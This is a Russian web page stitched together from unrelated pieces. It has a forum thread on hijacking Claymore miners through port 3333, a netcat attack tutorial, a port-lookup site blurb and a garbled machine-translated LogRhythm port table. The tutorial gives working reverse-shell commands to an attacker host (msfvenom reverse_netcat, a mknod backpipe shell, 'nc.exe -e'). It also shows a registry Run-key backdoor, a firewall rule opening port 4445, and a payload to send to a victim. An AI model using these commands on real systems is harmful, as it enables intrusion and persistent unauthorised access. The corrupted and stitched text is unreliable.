если запущен майнер открывается порт 3333, чтобы подключится к пулу, скажите «злоумышленник» может подключится к ферме и управлять, как это происходит, как обезопасить себя?
у тебя в конфиге клеймора есть возможность отключить удалённое управление и только мониторить. .. а если ты светишь белым адресом в инет и разрешил управление — конечно всем видно твою ферму
John_Mnemonik сказал(а):
у тебя в конфиге клеймора есть возможность отключить удалённое управление и только мониторить… а если ты светишь белым адресом в инет и разрешил управление — конечно всем видно твою ферму
Нажмите, чтобы раскрыть…
какая команда?
ГосподинПЖ сказал(а):
Только так может, он еще и вебку может включить и снять видос где ты за компом рукоблудством занимаешься, и потом в интернет выложит его! Злоумышленники они такие! Обезопасить просто, не смотреть парнуху на компом и не дрочить за ним же!
Нажмите, чтобы раскрыть. ..
не так трудно найти уязвимость в такое софте, как клеймор и проэксплуатировав её получить шелл на тачку.. и по поводу вебки тож не трудно, тем более на ссаной поделке била гейтса, пересобранной васей с торрента
stealer сказал(а):
какая команда?
Нажмите, чтобы раскрыть…
ты что-то менял ? по дефолту удалённое управление запрещено, только мониторинг. Почитай мануал, там много интересного
для доступа к ферме нужен только ip адрес?
stealer сказал(а):
для доступа к ферме нужен только ip адрес?
Нажмите, чтобы раскрыть. ..
192.168.1.1:3333 — в таком виде. если твоя ферма смотрит в инет через роутер, или через свисток 3г — расслабься
ребята, вы хоть чутка пораскиньте своими мозгами.
давайте тут каждого будем обучать компьютерной грамотности?
Мнемоник верно сказал, а вот автор пришел за кнопкой бабло
stealer сказал(а):
если запущен майнер открывается порт 3333, чтобы подключится к пулу, скажите «злоумышленник» может подключится к ферме и управлять, как это происходит, как обезопасить себя?
Нажмите, чтобы раскрыть. ..
Ты что, посмотрел тот самый видос?
Антон сказал(а):
Ты что, посмотрел тот самый видос?
Нажмите, чтобы раскрыть…
а что за видео, можно ссыль ? очень интересно
John_Mnemonik сказал(а):
а что за видео, можно ссыль ? очень интересно
Нажмите, чтобы раскрыть. ..
Ссылки запрещены, меня забанят…
Ты бы ерундой не занимался…
друг так мониторил сеть и подрубался к чужому клемору и подменял на свои пулы)
HurricaneTWIST сказал(а):
друг так мониторил сеть и подрубался к чужому клемору и подменял на свои пулы)
Нажмите, чтобы раскрыть.
..
Кот с лампой смотрит на вас с подозрением…
HurricaneTWIST сказал(а):
друг так мониторил сеть и подрубался к чужому клемору и подменял на свои пулы)
Нажмите, чтобы раскрыть…
серьезно? 98% майнеров сидят за НАТОМ.
гонит твой друг
Mazahaka сказал(а):
серьезно? 98% майнеров сидят за НАТОМ.
гонит твой другНажмите, чтобы раскрыть…
и погоняло у него во дворе было — «ПРОБИВАЮШИЙ НАТЫ»
Netcat, так-же используемый как “nc” – это сетевая утилита, которая использует TCP и UDP соединения для чтения и записи в сети. Он может быть использован как злоумышленниками, так и аудиторами безопасности. Учитывая сценарий атаки, этот кросс-функциональный инструмент может управляться скриптами, что делает его достаточно надежным, а также поможет нам отладить и исследовать сеть.
Netcat может делать все, будь то сканирование портов, захват баннеров, передача файла или даже создание обратного соединения.
Давайте рассмотрим основные функции netcat:
Он действует как простой клиент TCP/UDP/SCTP/SSL для взаимодействия с веб-серверами, серверами telnet, почтовыми серверами и другими сетевыми службами TCP/IP.
Он перенаправляет трафик TCP/UDP/SCTP на другие порты или хосты, действуя как SOCKS или HTTP прокси.
Netcat может даже подключаться к адресатам через цепочку анонимных или аутентифицированных прокси-серверов
Шифрует связь с помощью SSL и передает ее по IPv4 или IPv6.
Он действует как посредник соединений, позволяя двум (или более) клиентам подключаться через третий (посреднический) сервер. Итак, до сих пор вы, возможно, знали обо всех возможностях Netcat, которые делают его уникальным и просто. Давайте попробуем копнуть глубже и выяснить, что еще мы можем сделать с помощью этого замечательного инструмента.
Как обсуждалось ранее, netcat может выполнять все что угодно, поэтому теперь мы попробуем использовать целевую машину с помощью msfvenom для создания полезной нагрузки и настроим прослушиватель netcat для захвата сеанса.
Давайте попробуем создать полезную нагрузку, используя следующую команду:
msfvenom -p cmd/unix/reverse_netcat lhost=192. 168.123.123 lport=1234 R
Параметр «R» используется для создания необработанной полезной нагрузки, которая будет отображаться на нашем экране.
На изображении выше вы можете видеть, что наша полезная нагрузка готова, теперь пришло время запустить ее на сервере нашей жертвы.
Откройте машину Ubuntu и введите эту полезную нагрузку в терминал. Прежде чем запускать его, вернитесь к машине c Kali Linux и настройте прослушиватель netcat, используя тот же номер порта, который вы использовали при создании полезной нагрузки.
Но в случае с высоким уровнем безопасности мы не сможем захватить сеанс, используя этот метод, но есть и другой способ получить reverse shell. Перед этим настройте прослушиватель netcat на порт 443.
И после запуска nc, просто выполните следующие команды на атакуемой машине:
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 192.168.1.109 443 1>/tmp/backpipe
Это поможет вам обойти защиту и подключится к сеансу netcat.
Заголовки HTTP теперь не могут быть легко получены, так как они содержат информацию о сервере. Но мы можем использовать netcat для сбора информации о любом веб-сервере.
Просто запустите следующую команду, чтобы манипулировать целевым сервером и проверить, что мы захватили.
printf "GET / HTTP/1.0\r\n\r\n" | nc 192.168.123.123 80
На изображении вы можете видеть, что баннер HTTP получен, и нам представлен сервер nginx.
Теперь сгенерируем бэкдор на Windоws машине, который позволит нам войти в любое время. Давайте сначала настроим прослушиватель на нашей машине kali:nc –lvp 1234
Затем в командной строке Windows жертвы выполните следующую команду, чтобы создать бэкдор.nc.exe 192.168.123.123 1234 -e Backd.exe
После запуска Backd.exe мы получим reverse shell, а также будем получать бэк-коннект даже после разрыва соединения между машинами, при условии, что ip адрес атакуемой машины останется тот-же, и Backd. exe будет запущен.
Итак, давайте попробуем создать постоянный бэкдор, используя netcat и Metasploit framework на хосте, который мы скомпрометировали. На изображении ниже вы можете видеть, что я захватил сеанс Meterpreter на машине с Windows 10. Теперь загрузите файл netcat.exe в system32 на компьютере жертвы с помощью следующей команды:upload /usr/share/windows-binaries/nc.exe C:\windows\system32
Теперь настройте netcat для прослушивания любого случайного порта, скажем, 4445, откройте порт при запуске и установите соединение. Используйте следующую команду:reg setval -k HKLM\software\microsoft\windows\currentversion\run - v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'
При успешном подключении к netcat мы получим reverse shell машины жертвы.
Теперь пришло время добавить новое правило в брандмауэр с именем «netcat», в котором входящее соединение будет разрешать порт 4445 с помощью интерактивного cmd, запускающей команду netsh.
Введите следующую команду:netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445
Теперь проверим режим работы и состояние порта, следующей командой:netsh firewall show portopening
Теперь, когда жертва снова перезагрузит систему, мы получим оболочку netcat. Выполните следующую команду, чтобы подключить наш бэкдор netcat через порт 4445:nc -nv 192.168.1.105 4445
Мы успешно установили постоянный бэкдор, теперь всякий раз, когда жертва загружается, у нас всегда будет его сессия.
Итак, давайте узнаем, как мы можем подключиться к жертве через наш Netcat shell, используя полезную нагрузку msfvenom. Запустите терминал и выполните следующую команду, чтобы сгенерировать полезную нагрузку .exe.msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.109 lport=3333 –f exe > shell.exe
Теперь включите Netcat через порт 3333:nc -lvp 3333
Поделитесь этой сгенерированной полезной нагрузкой с жертвой, и как только он откроет ее, вы получите обратное соединение.
Дорогой друг ! Добро пожаловать в нашу библиотеку портов! Здесь вы можете найти информацию о порте по номерам портов и найти номер порта по описанию, это совершенно бесплатно.
Помогите нам стать лучше — напишите отзыв
Наслаждайтесь вместе с нами, с наилучшими пожеланиями — служба поддержки |
Обновления [19 ноября 2016]
Мы обновили все библиотеки для портов TCP/UPD, и они актуальны. Инструменты для сканирования также были обновлены, и были добавлены некоторые новые функции, пожалуйста, сообщите нам, если что-то будет работать не так.
Инструменты для объявления порта ping [Новости 2009-10-26]
Мы считаем, что инструмент порта, пингующий какой-либо пользовательский порт на сервере, может быть полезен, потому что он показывает время принятия соединения, которое связано со статистикой загрузки сервера. Обычный пинг проходит нормально во всех случаях, когда сетевая карта жива, а при зависании сервера — пинг продолжает работать. Этот случай пинга будет продолжаться, только если программное обеспечение живо.
Выпущен инструмент сканирования хостов и диапазона IP-адресов! [Новости 2009-10-12]
Итак, это «Сканер портов диапазона IP» в левом меню. Этот инструмент создан для проверки одного номера порта, но всего диапазона ip (не на одном сервере). Тестировалось на Firefox 3, FireFox 3.5, InternetExplorer 7, Opera 9, но результат может быть не совсем верным, в ходе тестов было установлено, что он корректен не менее чем на 88%.
Выпущен инструмент для сканирования портов! [Новости 2009-10-04]
Инструмент выпущен, он вызывает «Проверить все открытые порты» в левом меню. Тестировалось на Firefox 3, FireFox 3.5, InternetExplorer 7, Opera 9.и работает хорошо, но не работает в Koncueror brwoser. Качество сканирования связано с браузером пользователя и настройками интернет-провайдера, во время тестирования было обнаружено, что инструмент показывает больше портов как «открытых», чем на самом деле, но нет возможности проверить порт из браузера.
Объявление об инструменте сканирования портов [Новости 2009-09-28]
У нас уже есть инструмент, который можно использовать для сканирования ограниченного числа портов (сканирование идет с нашего сервера). Как мы находим, как разрешить нашим пользователям сканировать неограниченное количество (до 49000) портов сервера на один запрос — будет очень полезно для исследования проблем безопасности своего сервера, или просто найдите, какие порты остаются открытыми во время какой-либо внешней (сетевой) или внутренней (связанной с сервером) проблемы.
На этой странице вы можете найти инструменты для поиска номеров портов TCP и номеров портов UDP .
Текущий сервис содержит самый большой список портов tcp udp . Всего записей около 22000 (в 3 раза больше, чем в другом сервисе).
Библиотеки:
Ассортимент портов:
Существуют общие рекомендации, соображения и стандарты, которые следует учитывать перед развертыванием решения в сети. На этой странице рассматриваются вопросы и требования к сети и связи, которые помогут вам развернуть ваше решение.
Компоненты LogRhythm взаимодействуют через TCP, UDP или HTTPS через определенные порты. TLS используется при получении журналов в процессоре данных от системного монитора LogRhythm, а также при отправке журналов из процессора данных в AI Engine. На приведенной ниже диаграмме показана связь между компонентами и конкретными используемыми протоколами и портами.
В следующих таблицах перечислены все сетевые подключения и взаимодействия в развертывании LogRhythm. Они могут помочь системным и сетевым администраторам настроить устройства и программное обеспечение для контроля доступа к сети.
Components | ||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Client: AI Engine | ||||||||||||||||
Client Port | Server | Server Port | Protocol | Purpose | ||||||||||||
8300 | Platform Manager | 8300 | TCP | Входящие запросы RPC от клиентских экземпляров Consul | ||||||||||||
8501 | Менеджер платформы | 8501 | HTTPS | Auth/Config/Поиск между API-шлюзом на AIE и PM | ||||||||||||
8301 | Manage узел связи между экземплярами Consul Порт 8301 должен быть открыт для трафика TCP и UDP на всех хостах (PM, DP, DX, AIE, Web) в вашем развертывании, за исключением клиентской консоли и хостов агента. 8301 — это двунаправленный порт связи, используемый между всеми хостами Consul. Если порт заблокирован, хосты в вашем развертывании не смогут присоединиться к кластеру Consul. Данные журнала или данные клиентов не передаются между хостами через этот порт. Он используется только для связи между хостами LR. | |||||||||||||||
Random | Platform Manager | 1433 | TCP | Configuration details from EMDB on PM | ||||||||||||
3334, 3335 | Data Processor | 30000, 30001 | TCP | AIE Data Provider on DP пересылка данных журнала в AIE Comm Manager | ||||||||||||
Клиент: Консоль клиента | ||||||||||||||||
Порт клиента | Сервер | Порт сервера | Протокол | Purpose | ||||||||||||
8501 | Data Indexer | 8501 | HTTPS | Auth/config/search requests between API Gateway on Console and DX | ||||||||||||
8501 | Platform Manager | 8501 | HTTPS | Запросы аутентификации/конфигурации/поиска между шлюзом API на консоли и PM | ||||||||||||
Random | Platform Manager | 1433 | TCP | Консоль SQL Server доступ к PM EMDB | ||||||||||||
Client: Common Components | ||||||||||||||||
Client Port | Server | Server Port | Protocol | Purpose | ||||||||||||
Random | Metrics Database (InfluxDB) | 8076 | TCP | Уровень сохраняемости для метрик временных рядов | ||||||||||||
Random | Сбор метрик (Telegraf) | 8125 | TCP |
| ||||||||||||
Случайное | Веб-интерфейс Metrics (Grafana) | 3000 | TCP | Пользовательский интерфейс для просмотра и изучения показателей | ||||||||||||
Клиент: индексатор данных | ||||||||||||||||
Client Port | Server | Server Port | Protocol | Purpose | ||||||||||||
Random | Platform Manager | 1433 | TCP | DX SQL Server access to PM EMDB | ||||||||||||
8501 | Platform Manager | 8501 | HTTPS | Запросы аутентификации/конфигурации/поиска между шлюзом API на DX и PM | ||||||||||||
8300 | Менеджер платформы | 8300 | TCP | Incoming RPC requests from client Consul instances | ||||||||||||
8301 | Platform Manager | 8301 | TCP/UDP | Cluster membership and inter-node communications between Consul instances Port 8301 must be открыт для трафика TCP и UDP на всех хостах (PM, DP, DX, AIE, Web) в вашем развертывании, за исключением хостов клиентской консоли и агентов. 8301 — это двунаправленный порт связи, используемый между всеми хостами Consul. Если порт заблокирован, хосты в вашем развертывании не смогут присоединиться к кластеру Consul. Никакие данные журнала или данные клиентов не передаются между хостами через этот порт. Он используется только для связи между узлами LR. | ||||||||||||
Client: Data Processor | ||||||||||||||||
Client Port | Server | Server Port | Protocol | Purpose | ||||||||||||
8501 | Data Indexer | 8501 | HTTPS | Auth/config /search запросы между шлюзом API на DP и DX | ||||||||||||
Клиент: LR API | ||||||||||||||||
Порт клиента | Сервер | Порт сервера | Protocol | Purpose | ||||||||||||
Random | Platform Manager | 1433 | TCP | Bidirectional connection between LR API and PM | ||||||||||||
Client: LR KB Update | ||||||||||||||||
Client Port | Server | Порт сервера | Протокол | Назначение | ||||||||||||
Н/Д | Менеджер платформы | 80, 443 | Обновления TCP | KB Двунаправленное соединение0015 | ||||||||||||
Клиент: открытый коллекционер | ||||||||||||||||
Направление | Источник> Пункт | Сервер | Протокол | |||||||||||||
443 | HTTPS | Определение последних версий контейнера0015 | HTTPS | Download latest Open Collector software | ||||||||||||
Outbound | Open Collector > Windows System Monitor Agent | 514 | HTTPS | Syslog feed of data to LogRhythm SIEM | ||||||||||||
Inbound | User Machine > Open Collector | 3000 | HTTP | Просмотр показателей Open Collector в Grafana | ||||||||||||
Входящие | Компьютер пользователя > Open Collector | 22 | SSH | Interact with Open Collector | ||||||||||||
Client: Platform Manager | ||||||||||||||||
Client Port | Server | Server Port | Protocol | Purpose | ||||||||||||
8300 | Data Processor | 8300 | TCP | Входящие запросы RPC от клиентских экземпляров Consul | ||||||||||||
8301 | Процессор данных | 8301 | TCP/UDP | Членство в кластере и связь между узлами между экземплярами Consul Порт 8301 должен быть открыт для трафика TCP и UDP на всех хостах (PM, DP, DX, AIE, Web) в вашем развертывании с исключение клиентской консоли и хостов агента. 8301 — это двунаправленный порт связи, используемый между всеми хостами Consul. Если порт заблокирован, хосты в вашем развертывании не смогут присоединиться к кластеру Consul. Никакие данные журнала или данные клиентов не передаются между хостами через этот порт. Он используется только для связи между узлами LR. | ||||||||||||
8501 | Data Processor | 8501 | HTTPS | Auth/config/search requests between API Gateway on DP and PM | ||||||||||||
Random | Data Processor | 1433 | TCP | DP SQL Доступ сервера к PM EMDB | ||||||||||||
Клиент: Системный монитор/Сборщик данных | ||||||||||||||||
Порт клиента | Сервер | Порт сервера | Протокол | Цель | ||||||||||||
0 (ранее 3333) | Процессор данных | 40000 | TCP | Forwards Log Log Данные по DP DP при запуске в режиме универсального агента. Процессор данных | 443 | TCP | Перенаправляет необработанные данные журнала на DP при работе в двунаправленном режиме | |||||||||
Клиент: веб-браузер | ||||||||||||||||
Клиентский порт | Сервер | Сервер порт | Протокол | Цель | ||||||||||||
Случайный | Web Console | 8443 | HTTTTTS | . | . | . | . | . | ||||||||
Client: Web Console | ||||||||||||||||
Client Port | Server | Server Port | Protocol | Purpose | ||||||||||||
8300 | Platform Manager | 8300 | TCP | Incoming RPC requests from client Consul instances | ||||||||||||
8501 | Platform Manager | 8501 | HTTPS | Auth/config/search requests between API Gateway on Web and PM | ||||||||||||
8501 | Индексатор данных | 8501 | HTTPS | Запросы аутентификации/конфигурации/поиска между шлюзом API в Интернете и DX | ||||||||||||
Произвольное | Platform Manager | 1433 | TCP | Веб-консоль Доступ SQL Server к базе данных событий PM. | ||||||||||||
8301 | Platform Manager | 8301 | TCP/UDP | Членство в кластере и межузловые связи между экземплярами Consul DX, AIE, Web) в вашем развертывании, за исключением хостов Client Console и Agent. 8301 — это двунаправленный порт связи, используемый между всеми хостами Consul. Если порт заблокирован, хосты в вашем развертывании не смогут присоединиться к кластеру Consul. Никакие данные журнала или данные клиентов не передаются между хостами через этот порт. Он используется только для связи между узлами LR. | ||||||||||||
43 | WHOIS | 43 | TCP | Run a whois query using contextualization | ||||||||||||
Client: Web Console Case API | ||||||||||||||||
Client Port | Server | Server Port | Протокол | Цель | ||||||||||||
† | † | † | † | |||||||||||||
Клиент: True Identity Client | ||||||||||||||||
. 0851 Client Port | Server | Server Port | Protocol | Purpose | ||||||||||||
389 | AD Server | 389 | LDAP | TrueIdentity Sync Client access to the LDAP server | ||||||||||||
636 | AD Server | 636 | LDAP | Доступ клиента TrueIdentity Sync к защищенному серверу LDAP | ||||||||||||
8505 (локальные запросы) | Admin API, Platform Manager | 8505 (локальные запросы) | https | Подключение к ADM API | ||||||||||||
8501 (удаленные запросы) | ADMPI, менеджер платформы | 8501 (RELETE RELETE) | 15015015 9015 9015 9015 9015 9015 9015 9015 9015 9015 9015 9015 9015 9015 9015 9015. |
.0129 | Server Port | Protocol | Purpose | |||||
---|---|---|---|---|---|---|---|---|
LogRhythm Platform Manager and Web Console | Random | SMTP Server | 25 | TCP | Unidirectional, Client Initiated | |||
LogRhythm Platform Manager | Random | SNMP Manager | 162 | UDP | Однонаправленный, инициируется клиентом | |||
LogRhythm Platform Manager | ** | McAfee ePO Server | ** | ** |
Devices Sending Logs | |||||
---|---|---|---|---|---|
Client | Client Port | Сервер | Порт сервера | Протокол | Назначение |
Устройство системного журнала UDP | Случайное | Агент LogRhythm | 1 5514 90 500120012 UDP | Unidirectional | |
TCP Syslog Device | Random | LogRhythm Agent | 514 | TCP | Unidirectional |
NetFlow v1, v5 or v9 Device | Configurable | LogRhythm Agent | 5500 | UDP | Однонаправленный |
Устройство IPFIX | Конфигурируемый | Агент LogRhythm | 5500 | UDP | Unidirectional |
J-Flow Device | Configurable | LogRhythm Agent | 5500 | UDP | Unidirectional |
sFlow Device | Configurable | LogRhythm Agent | 6343 | UDP | Unidirectional |
SNMP-ловушка | Конфигурируемый | Агент LogRhythm | 161 | UDP | Однонаправленный |
Remote Log Collection | |||||
---|---|---|---|---|---|
Client | Client Port | Server | Server Port | Protocol | Purpose |
LogRhythm Agent | Произвольный | Хост Windows (журналы событий Windows) | 135, 137, 138, 139 445 | TCP/RPC | Двунаправленный, по инициативе клиента |
LogRhythm Agent | Random | Database Server (UDLA) | DB Server dependent | TCP/ODBC | Bidirectional, Client Initiated |
LogRhythm Agent | Random | Check Point Firewall | 18184 | TCP/OPSEC LEA | Двунаправленный, инициированный клиентом |
Агент LogRhythm | Произвольный | Cisco IDS (SDEE) | 443 | TCP/HTTPS | Bidirectional, Client Initiated |
LogRhythm Agent | Random | Nessus Server | 8834 | TCP/HTTPS | Bidirectional, Client Initiated |
LogRhythm Agent | Random | Сервер Qualys | 443 | TCP/HTTPS | Двунаправленный, инициируется клиентом |
Агент LogRhythm | Случайный выбор | Сервер Metasploit | 3790 | TCP/HTTPS | Bidirectional, Client Initiated |
LogRhythm Agent | Random | Nexpose Server | 3780 | TCP/HTTPS | Bidirectional, Client Initiated |
LogRhythm Agent | Random | Retina Server | 1433 | TCP/ODBC | Двунаправленный, инициируется клиентом |
Агент LogRhythm | 4444 | eStreamer Server | 8302 | TCP/HTTPS | Bidirectional, Client Initiated |
Data Indexer — Inbound Ports | |||||
---|---|---|---|---|---|
Appliance | Протокол | Входящий порт | Получено от. .. | Операционная система | Цель |
PM — Аварийное восстановление | TCP | 5022 | Связанная с дистанционной передачей. Windows и Linux | Доступ SQL Server к EMDB | |
Шлюз API LogRhythm | HTTPS | 8501 | Шлюз API | Windows и Linux | Обеспечивает безопасную связь между службами с балансировкой нагрузки и возможностью обнаружения. Требуется для использования JWT из API аутентификации. |
Consul | TCP/UDP | 8300, 8301 | Service Registry | Windows & Linux | Establishes a secure cluster between the LogRhythm hosts in a deployment, not including agents |
Data Indexer — Local Ports | |||||
---|---|---|---|---|---|
Service | Protocol | Port | Direction | Operating System | Purpose |
Columbo | TCP | 13131, 13133 | DX Local Только | Windows и Linux | Внутренняя обработка Columbo |
Consul | TCP/UDP | 8300, 8301 | Inter-node | Windows & Linux | Nodes in cluster sharing keys |
8500 | DX Local Only | Windows | Consul administration dashboard | ||
Elasticsearch | TCP | 9200 | DX Local Only | Windows & Linux | Запросы Curl к Elasticsearch |
9300-9400 | Межузловые | Linux | Репликация и объединение между узлами |
Open Collector | |||||
---|---|---|---|---|---|
Direction | Port | Protocol | Source | Destination | Purpose |
Outbound | 443 | HTTPS | Открытый коллектор | *. github.com | Определение последних версий контейнеров |
Исходящий | 443 | HTTPS | Открытый коллектор | *.gcr.io | Download latest Open Collector software |
Inbound | 3000 | HTTP | User machine | Open Collector | View Open Collector metrics in Grafana |
Inbound | 22 | SSH | Пользовательская машина | Open Collector | Interact with Open Collector |
Outbound | 514 | HTTPS | Open Collector | Windows System Monitor Agent | Syslog feed of data to LogRhythm SIEM |
Beats | |||||
Направление | Порт | Протокол | Источник | Назначение | Назначение |
Исходящий | 443 | HTTPS | Beats | *. |